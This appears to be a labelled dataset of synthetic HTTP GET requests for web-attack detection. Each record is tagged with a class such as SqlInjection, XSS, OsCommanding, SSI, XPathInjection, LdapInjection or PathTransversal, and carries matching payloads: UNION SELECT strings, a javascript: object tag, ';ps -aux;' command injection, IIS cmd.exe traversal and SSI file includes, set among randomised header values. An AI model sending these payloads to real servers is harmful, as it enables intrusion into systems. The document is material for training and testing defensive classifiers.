GET /VWu0.php4?1RrznerUewo=6C7mY479.yUg&veatshfe=unItpa&hsa7nAa5apts=tixp_+%27yae&ncx1jl=%27++OR+++%27renaUzTeoeta%27+BETWEEN++++%27R%27++AND+%27T HTTP/1.1
Host: 184.249.172.57
Connection: hbaoNn
Accept: audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.221.217.71
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="2"
Date: Fri, 19 Nov 04 11:06:59 CET
ETag: W/"bdccCy6uK1YsnZ3Ajlk0"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Thu, 05 May 05 04:59:11 GMT
If-Unmodified-Since: Tue, 12 Aug 08 12:08:03 CET
If-Match: "lkGyeulRSnjTR6Yc"
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 4.3
Pragma: ol=Ret4eili
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: naiao P9E9e=cekn
Range: 2-
Referer: http://eeru.st/nelte/Mcft/c5ehul/zencuqre/rtelA5sk.jpeg
TE: trailers
Trailer: Via
User-Agent: bpcre (a.wD6Ry; fRavycM)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: riEn3/0.7 92.24.213.228, kFa/5.6 www.plsaese.js, 0.8 www.gn0enu.png
Transfer-Encoding: deflate
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42527
Start - Id: 46571
class: XSS
GET /nV3fXBAU9vyU2/hLBS.css?2ojIhed0=mnalinkbe7rog+dn&vOvmlEws5fheh=aJaUaQM&wp8sie5rieoiheh=o0iyrsH9o7dothconh&pnTr=iteskiee&nhsdt7defeta=9%5Cu0e&xin=747&uEfstdieEnih=m9X%40A&yraN9eUmiusbn=lihtincJumwth&7Ir=nd1ntnto&nOhONq=0291&rennobqudnhtea=2mnRSorihrttetsi&otxrIfciz4dyecI=lf7wS_&en7sr=4976270&rott8lesjsw=7&tDnu=n1TEsaoq1q4S HTTP/1.1
Host: www.i0ea.gov
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.9
Accept-Encoding: *
Accept-Language: <object  classid   =    " clsid:...   "    codebase= "     javascript:    [alert  ('y2dUlhgdzu');] " >
Cache-Control: max-stale=3
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Cookie2: $Version="1"
Date: Sat, 18 Feb 06 20:27:50 UTC
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: 100-continue
If-Modified-Since: Fri, 21 Sep 07 08:57:44 UTC
If-Unmodified-Since: Wed, 02 Dec 09 01:15:02 UTC
If-Match: "-nRxGvoUVwFASLw"
If-None-Match: *
If-Range: Mon, 20 Aug 07 05:16:13 CET
Max-Forwards: 435
MIME-Version: 3.9
Pragma: q1we='mludrnf'
Authorization: Digest realm
Range: 70-
Referer: /z6stfT/tattuht.swf
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/9.5 (X11; U; Open BSD i386 7.7; 5n-g8; rv:3.0.5) Gecko/99148054
UA-CPU: PowerPC
UA-OS: Win98
UA-Pixels: 5605x1554
Via: 1.5 2.25.31.149, 9.3 65.91.116.162, 1.1 18.119.99.179:9
Transfer-Encoding: compress
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 061 www.jmFttlrn.js "lnQacp2ufeTocbi0I" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46571
Start - Id: 43338
class: OsCommanding
GET /cO6VRWXhZfB/hLfn3435ouThI/goH@DqDP/2BHboot.ini/xMhJ3aKpX/metfxet1OaDdom2Ag/e4n9EocdEi9romo8/reeoe8iHw5m5PJKMDW@g/tyayteqs7oieth/nrnrtasocahI1eb/93lyEuone.sh?hleuslPsn=%2Ft&srj6yu6csT=gnnea%5Cengll3rusra2tn%26u&Giehou=%27++++%3Bps+++-aux+%3B HTTP/1.0
Host: 15.195.62.2
Connection: close
Accept: video/mpeg;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: e9e-oonnm;q=0.5, aoehi-ttantttk;q=0.3, do0ck-oeFidi;q=0.6, i-rd, u29cwwho-6aiennc3;q=0.3
Cache-Control: max-stale=71533
Client-ip: 72.77.48.25
Cookie: E0aiefsC5txnf=032004;etew8u9E9t4ei=kVR4FBEI;sH=aTc;A5S7g=between/uchildjR;vhf=5231
Cookie2: $Version="529"
Date: Sat, 12 Jun 04 15:41:35 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: *
If-None-Match: *
If-Range: "4.JV.yFYeE-kl2@q2"
Max-Forwards: 26
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: Digest nonce
Range: -3
Referer: http://www.twSm.it/rktTLn/mseei/9rht.tar.gz
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/9.1 (X11; U; Open BSD i586 7.3; zf-eo; rv:4.8.9) Gecko/61044165
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3955x3955
Via: HTTP/1.9 www.hheohsl3.shtml, HTTP/7.7 www.n3si.png, FTP/3.4 71.78.218.198
Transfer-Encoding: gzip
Upgrade: 8atc6a/5.7, oCej/1.5, Siiai/7.2
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43338
Start - Id: 44228
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 136.228.146.94
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Thu, 09 Jun 05 11:43:41 CET
ETag: "tzNRwsuen.u4CaPKh"
Expect: L2fr=taeh2;o6alf
From: 37idSerd@ombp.uk
If-Modified-Since: Sun, 05 Sep 04 24:15:02 GMT
If-Unmodified-Since: Fri, 23 Dec 05 16:31:24 CET
If-Match: *
If-None-Match: "I2tv5PVee4wFP8yJYk"
If-Range: Tue, 22 Dec 09 21:12:15 UTC
Max-Forwards: 0
MIME-Version: 1.1
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: ue0n Ftyeimsl=fegaMEnt
Range: 09660-850419
Referer: /asiohX/al9j/bhT4tETh/lscoru.shtml
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 8.4; s9-ed; rv:7.8.7) Gecko/42583413
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x848
Via: 9.5 236.214.221.65, 1.8 246.253.251.27, 2.7 251.200.245.51:06
Transfer-Encoding: hyjlh8; h88og=mtjiTugS
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44228
Start - Id: 40499
class: SSI
GET /oy6as/HMtS7uvbscript_yPIBSaQ/ufrcsfme3t5lxyseeiEl/yTtn2tbndsntT6eniufo/dR60hchahquiRnihs2/enli/9TylR31xP.htm?J7.Ipshtpass=gtrraneov9&antltgihtnem=bG8N.K&lt=+hiidtphptmpml%7Cao%5Deservicesi&UJahome4p2u=g8te%28o9ut+w&hKhUeasce7pe1s=trssterqewue&eo8AoiuaG=nmvolo&bctsu=nue%25n%3BcadminItUw&kC0pGeX=nyocneTmsotn&ocee=0&ho=365863&uamdlcoje7xz5=tQ%40igI&etnio3Rna=064613636&L2sNer=66001&S6dNeHpiEthhEia=%3C%21--%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&auNeqn=dynh HTTP/1.0
Host: www.0iyl.gov
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=8075
Client-ip: 23.11.134.211
Cookie: iAw=h_FtIwLe4dQp;7pclNlamLehotsn=uYEFxZniAhx.
Cookie2: $Version="148"
Date: Thu, 15 Nov 07 23:48:58 GMT
ETag: W/"tQ..TqsAmpq4am6OZRoc"
Expect: 100-continue
From: wsWpne@sapo.cz
If-Modified-Since: Mon, 01 Jan 07 24:41:04 CET
If-Unmodified-Since: Wed, 20 Jan 10 09:44:46 GMT
If-Match: "yX6.nEjya0vofiyA"
If-None-Match: "bd97IbNty08ArTR508"
If-Range: *
Max-Forwards: 3693
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: qiee is3OjGer=ao7snt
Range: 8620-2,-84982
Referer: http://huUe.org/olt8ihnm/iiam/Emtwo/cnoeeaid/0eaUln.gif
TE: trailers
Trailer: Warning
User-Agent: o1mmsjsh (1eCbOZxg)
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0287x026
Via: 9.1 www.evotIvi.tiff:08371, HTTP/2.9 110.159.178.233
Transfer-Encoding: identity
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40499
Start - Id: 49162
class: XPathInjection
GET /nOMugWGhjlPJadVa9/Yza-Zpassthru/i614lz-MVv/neAplsaeh/sTIqKFm.css?thod=0nformeL&Zqp1O=26&aqgn8w=ashpja%27+++++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++++%27pi3oc%27+%3D%27&qe2ocm=eYxin8&siitsofdkheXy=%5BwlTm&avawa=em&r6secque=e&ez9ehocrezt3c6=Ee&hiottmi6pk=gq.XMjmWf&pgeWTehgc=3Hiuhadscei&axSdoaodSf2a=%2B&aoirhseputaeUda=aN%3Cn&hbdqaisohctN3t=-Wv&oqioc=n5mITt&rvzai7oul=p7.tntT HTTP/1.0
Host: www.jbomnnr.org:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-jp;q=0.5, iso-8859-9;q=0.8, x-mac-cyrillic;q=0.0, gb2312
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 38.175.250.11
Cookie: szbamtee9xiyfn7=3;tea8fnoztnjiOs=p s t;cnAn=567564;ld6wrm1foee=xtermrl
Cookie2: $Version="33"
Date: Sat, 16 Apr 05 22:29:41 GMT
ETag: "CXlJzMWgpePUm-c"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 20 Jul 08 21:57:27 GMT
If-Match: "shEY8lUE6h5QP5yh"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: Wed, 16 May 07 15:04:46 GMT
Max-Forwards: 870
MIME-Version: 5.8
Pragma: yEweamfG='67'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: http://www.fyiux.it/Twrbeao/soteb/cnEeq.pl
TE: trailers,trailers,deflate;q=0.6
Trailer: If-Range
User-Agent: Mozilla/0.1 (compatible; llmoicion; Linux i586; EQmex)
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: 9.9 www.eere.htm, 7.2 www.kgnes.js
Transfer-Encoding: compress
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49162
Start - Id: 40809
class: SSI
GET /eyZmlZLbE_pPt9UBq/t9gX2HPDqO5NW/o4ez4hnwwcnenAHs8Eo/vcsnnh2f/z3eoreul7naH/chhOLTyvzXcSrX.2za/laFSB_cZIA0@cbxeo/d7y2YZyH4skOu/fhB/mailf0nodejXTZZ2ctlog.htm?wnwdiusEtn=%3C%21--+++%23odbc+++connect%3D%22aodcojR%2Chxhv%2Csda%22+++++++statement%3D%22select++*+from++++s%22--%3E&mdolpl7e2eaeB=oJUyURH.g&oygfufeoD9a=4hechop&@I40t=pWmpkUmV&sd1keGneDo9=ccuirawdehsSss&Na3owtjnnc=usrmdmz&M2.KZuA.27J=scripttsama+&t0aUn=Wetac%26i8Le&pat=%5B%5Ce&z4wgetY=selectrgIe HTTP/1.1
Host: 7.226.27.125:6
Connection: dnNlo
Accept: image/jpeg, application/postscript;q=0.4
Accept-Charset: cp-936;q=0.2, euc-tw;q=0.5, windows-1253;q=0.8
Accept-Encoding: deflate;q=0.7, compress;q=0.0
Accept-Language: l-detlrots
Cache-Control: no-cache
Client-ip: 34.137.144.86
Cookie: dt7sdarannd=usock_streamo
Cookie2: $Version="4"
Date: Sun, 28 Jan 07 09:05:56 CET
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Wed, 18 Jan 06 11:58:44 GMT
If-Unmodified-Since: Fri, 15 Sep 06 11:09:36 CET
If-Match: "SnWfAvpwjBHRiWG"
If-None-Match: "CwX-fkL1.4XkvjLfXv"
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 507
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="9des"
Authorization: lgn0a eiae3xs=niaoa7wd
Range: -4,-190,-803524
Referer: /Gwal/rErrn/feglenzh/nrni.gif
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/5.5 (compatible; mervmm; SunOS sun4u; jegiUnysW; Nuapddai; bFchmw9e)
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.1 www.v5steer.jpg
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: t9tt/3.9, 2htSi/0.2, hta3f/5.3
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40809
Start - Id: 45312
class: PathTransversal
GET /-SZMwYAEc/ledSehmdf4l1shnnnrar/mu63ZF07.CVulAsNjS.msf?snttmcerrl=LI5oqsl%29nta&andielzCrr=oeec6abh0&nntisemhlos=raeftroai7&sahmumwp=t%409&oyah=81771&rtaeagrrex=ms%40ia HTTP/1.1
Host: 78.198.68.19
Connection: keep-alive
Accept: audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 68.185.43.196
Cookie: pnXb8ef=52151513;yeal5a83ji=/../../../Inetpub/iissamples/ro/chna/rochseolie/siestinaro.cgi
Cookie2: $Version="321"
Date: Mon, 16 Jul 07 01:39:57 CET
ETag: "IYiQLsWGyvvx1Vo"
Expect: erzu
From: Un82c5ul@mludef.cz
If-Modified-Since: Wed, 05 Dec 07 02:23:37 GMT
If-Unmodified-Since: Mon, 02 Feb 04 22:47:16 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Nov 07 08:29:52 CET
Max-Forwards: 667
MIME-Version: 2.6
Pragma: 7eidtTds=othD
Proxy-Authorization: NTLM aWZyaWxmdHlkb2JyYXRzeWhoc29vOG1zZ2V0M3NkY3I=
Authorization: noTqIo lse3r2Yc=e70s
Range: 1448-672,0738-
Referer: /rrtf/be6td/taed/a47D.fgf
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Hdesdp8navd8fniemeg
UA-CPU: 68000
UA-Disp: 3671,6094,32
UA-Color: color8
UA-Pixels: 7175x8501
Via: hZmshn/7.4 237.182.78.211:604, FTP/2.9 www.dyet.js, rUroh1/2.0 www.nvnjEepa.shtml
Transfer-Encoding: deflate
Upgrade: eTg3a/6.0
Warning: 903 www.geeeueha.html "p6zashvaoAtaye" "Sun, 14 Sep 08 14:09:13 CET"
X-Forwarded-For: 77.147.136.100
X-Serial-Number: 09294275235360204964
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45312
Start - Id: 48718
class: XPathInjection
GET /EnAoBRWetcFJ/LSXunA5astyleb/icd7attjtsdbod/i6Ae7CwEDI/W89/nnsMr/nQzO_JTqch0ZmJSkyZYJ.htm?wmttt=andqao&8e3wbdh7nee9ioj=aeeacE6er6eesr&snote1emn=dkvxz-Jh&otuetdnmon7GMi=178&nsii=Iw8xwatG9e&snslh=34379633&yaHeh0eaoaPkit=u&enywuo=jm&nab6=ersEphp+&crlpNmvs=tmmuesdcribj5hrriX&laO=6692+++or++1%3C+++++7%2FkigLo6%2Fmtot%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D36%5D++++or++26806%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&osD1eneeetsta=sl+&rt9oRnRrdnc4ctm=+ebF1lieinsertxichilddnKu&g8ietel=nD%40 HTTP/1.0
Host: www.nrT9.be
Connection: emate
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: dorBhne=eagb8
Client-ip: 38.215.80.1
Cookie: si1s9gariritn=36032028;a4tIEM=r+memcoia;n18v=leezt rSuEih ys'Q;Egpvaneccc5=532;l3aswo=G0>torfhnq/;fEhYT=2
Cookie2: $Version="7"
Date: Sun, 24 Jul 05 09:24:01 UTC
Expect: 100-continue
From: nmen@jnnfeo.biz
If-Modified-Since: Fri, 20 Jun 08 21:29:23 GMT
If-Unmodified-Since: Mon, 20 Oct 08 12:55:00 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 4
Pragma: a2sw='soaurw'
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Digest response="2d061edCDdeBC6976Ae414Fbd85c3Ef0"
Range: 10010-
Referer: http://t9ikicsW.it/nitk/bcmhn/fhjpEcsh.zip
Trailer: Transfer-Encoding
User-Agent: ophveeer/5.0.5.4
UA-CPU: MIPS
Via: 8.4 www.pacmacwn.jpeg:36787
Transfer-Encoding: identity
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48718
Start - Id: 41678
class: SqlInjection
GET /oscxfitEnseeizTg/xLUAd1@eWi/lpj2debsoinclba5/t5wJEgionhv2CfNd/hjbkSVKYGKbGaFSk1U/mAc67DyuSbzI/hmeK3rw8HL65/osw.php3?etcK-gzrs=775&smC=%27++%29+++UNION+++++ALL+SELECT+7014%2C4%2C53%2C46%2C38+++++FROM+++++geh+++++WHERE+++%28++%27%27++++%3D++++%27 HTTP/1.1
Host: www.tSseWr.gov
Connection: close
Accept: audio/basic;q=0.1
Accept-Charset: cp-950
Accept-Encoding: *;q=0.1
Accept-Language: ae-jrhvwe4;q=0.8, urgcv-ishTptiw, c0su6ee-jdlie, s-hti4vrs;q=0.0, takV-eh;q=0.1
Cache-Control: no-cache
Client-ip: 31.225.142.110
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="83"
Date: Sat, 17 Jan 09 01:37:12 UTC
ETag: "qB-FTULONUY7iO2"
Expect: 100-continue
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Sun, 15 Feb 09 18:37:07 UTC
If-Match: *
If-None-Match: "A9jMPenfjqDAJ@8Pii"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: sstum6 urnsaUr=it6tsah
Range: -91,787-299778
Referer: http://www.bLenp.st/lepEOseu/eic3ng/wOvnego.cgi
TE: deflate,trailers,chunked;q=0.6
Trailer: Date
User-Agent: e9u73o
UA-CPU: x86
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: lls/5.8 248.254.73.247, 3.2 215.131.160.137
Transfer-Encoding: s53hi; n1uyhetA=ewes6aT
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41678
Start - Id: 42466
class: SqlInjection
GET /bc/emCURE0ME8k/dytNo0mBlbllx7d5/s4xuG2zRvxNP/pWOp3kaccess_logLVX/sbE3Ndk94tG2nY/kEa8/iuttltdliora7ed/iy1nlX4nniltaso/nIThfdoc3a/c@RWBlE2_XVOfH2Ol2W8/AQLnph-WGSH7.htm?Ari5cttahe=6185&blsees5lNraaio=t&Te1srep7ejh=enPSCo-rIW5&sacoe2enF=%2B1adircaa%7Ces6systemrn%5Csbt&nntttokhTas=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F5469%2F**%2FFROM%2F**%2FseSinedsk%2F**%2FWHERE%2F**%2F%28++++%27%27++%3D+++%27+%2F**%2F&ylegammei=071&iitllshttue=phi&n0b=OFtniot HTTP/1.1
Host: www.oeIOmish.st
Connection: close
Accept: application/zip;q=0.7, application/x-tar;q=0.0
Accept-Charset: iso-8859-8-i;q=0.4, euc-tw, iso-8859-6;q=0.1
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 88.195.225.227
Cookie: CoOECPsbi_DR=hen4 ;Anrc5iherdd=8;isLhytw3zoss=u8po;hEHPtntinynt=7918;AqCXhtacces-H544=431803
Cookie2: $Version="3"
Date: Sat, 23 Aug 08 12:01:26 GMT
ETag: W/"UAyFtb4@EEegyBiy."
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Fri, 07 Jan 05 03:07:10 CET
If-Unmodified-Since: Fri, 18 Dec 09 03:37:41 UTC
If-Match: "rcKZ4zPfuEH0GGAm07jg"
If-None-Match: *
If-Range: "NJd1NRKicrJPiTZwtjU"
Max-Forwards: 601
MIME-Version: 1.4
Pragma: nl=uT4esesi
Proxy-Authorization: Digest nonce
Authorization: 7an4e 9cqe4e=chEots
Range: 464608-7,46934-
Referer: http://www.7tei3T.st/3roae8Jg/tsanu/olabnEse/eTpsoa/btne1ayp.css
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (X11; U; Open BSD i386 0.6; pt-bo; rv:4.4.1) Gecko/77188903
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 733x829
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: identity
Upgrade: nhii/6.1, lbree/5.0
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42466
Start - Id: 37013
class: LdapInjection
GET /nALdhHdwl6/o3N@iB4XOqyX/e.fXLrBM/eOAPY1JHc@Pac/6ooEat0bhloErae.bin?ririOSe=841&gobsshrdoduo=oem4lk1sseisdin&rlE=sam0%29%28++++%7C++%28tdu%3D*%29 HTTP/1.1
Host: www.rlno.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 37.233.198.38
Cookie: yteitqhn=yh4ra
Cookie2: $Version="83"
Date: Mon, 27 Mar 06 15:34:54 UTC
ETag: "N8.y-fYy.PIhk9y"
Expect: sUyt3Hn=odaE
From: ete2k@zfNl4.de
If-Modified-Since: Wed, 28 Feb 07 12:02:45 GMT
If-Unmodified-Since: Sun, 23 May 04 07:33:29 CET
If-Match: "gfn_FMhroRuyqsEP_Z2"
If-None-Match: "7H4gI5pCf3_gBNjbksw"
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 0307
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Basic YWZ0ZHQ6bmdpbnBudHQ=
Range: 11-,-9658
Referer: /yksAEa/uvdgns/ueett.doc
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: Nepn (erTDd601; t2x7ya; i5fHWZk)
UA-CPU: StrongARM
UA-Disp: 435,7970,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2678x798
Via: pnxiI/7.7 211.95.176.56, 4.9 www.pLCd.jpeg:6
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37013
Start - Id: 44050
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.earhbrmsl.ch
Connection: close
Accept: text/html
Accept-Charset: windows-1258;q=0.3, iso-8859-7;q=0.7, windows-1258;q=0.3, cp-936
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: vFqw9bhtpassdCo=vfH(;x6zu9=2;zhomeG.xterm9.p=: J
Cookie2: $Version="0"
Date: Sun, 21 Nov 04 07:54:01 UTC
ETag: "KHyP8aOEWUQj0XgwGKg-"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 500
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: demilg fkza=h4aLh
Range: -0
Referer: /2H8amuwi/eaoy.php
TE: trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/7.6 (Windows; U; Win 9x 5.0; tt-bo; rv:1.2.2) Gecko/96369023
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 714x756
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: 8ehus
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44050
Start - Id: 48943
class: XPathInjection
GET /1GngWZB8etGYnvJ/ioNecewaelolri/f1MAw@3D2/AWEtmTN2I/j90D_uuygupE/rW_UdR8GR/60Ja/c-NZgrgRG36g7AGbSiQ/eb93k9/rsIEcnlas14dhaas/dj.msf?sottrseerheci=o2T&-WuXQfmmFzg=pmseI9cnw&t5o=0827+or+WmcuS%2Flmha4%2Frj%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D+or++66235%3D&xFI_XABoVwindow.openo=u+ptas%3D&itxto=5ch&ee=ts8g7test&FnSunionY=7+c9ideaetd&dorsBpnbiuoeix=q%7Cg+&DqdivHzJGe0dSwget=sttq3oc9eld&Siihhosste=rwtis-oo&qadesmBsriGnu=hk7%3F0wrhnrfEtr&mscrretds=14955353&isses7ernwn=zmmP9K02F&aalz=p-wPaP&W.MBL45W=ToTncetadx0c HTTP/1.1
